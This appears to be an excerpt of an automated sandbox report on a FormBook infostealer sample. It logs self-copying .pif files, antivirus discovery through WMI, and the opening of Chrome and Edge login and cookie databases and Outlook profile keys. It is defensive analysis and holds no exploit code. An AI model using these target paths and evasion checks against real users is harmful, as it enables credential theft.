            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000002.3324748822.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 00000010.00000000.2294862986.0000000001B81000.00000002.00000001.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000000.2480912245.00000000019C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Users\user\Desktop\4Ear91jgQ7.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,cq.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq.exe.IUGVA\surivitnA\GVA\)68x( seliF margorP\:C`,cq(C:\Program Files\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2130989636.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2291247580.0000000000C22000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2324698880.0000000006262000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2541110729.0000000006A92000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2541110729.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2433569408.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2608623012.00000000066E7000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2551562808.0000000001331000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2743626575.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2658321483.0000000000C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003592000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.000000000324B000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002C1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq(C:\Program Files\AVG\Antivirus\AVGUI.exe
            Source: 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3135279069.000000000655E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der\MsMpeng.exe
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
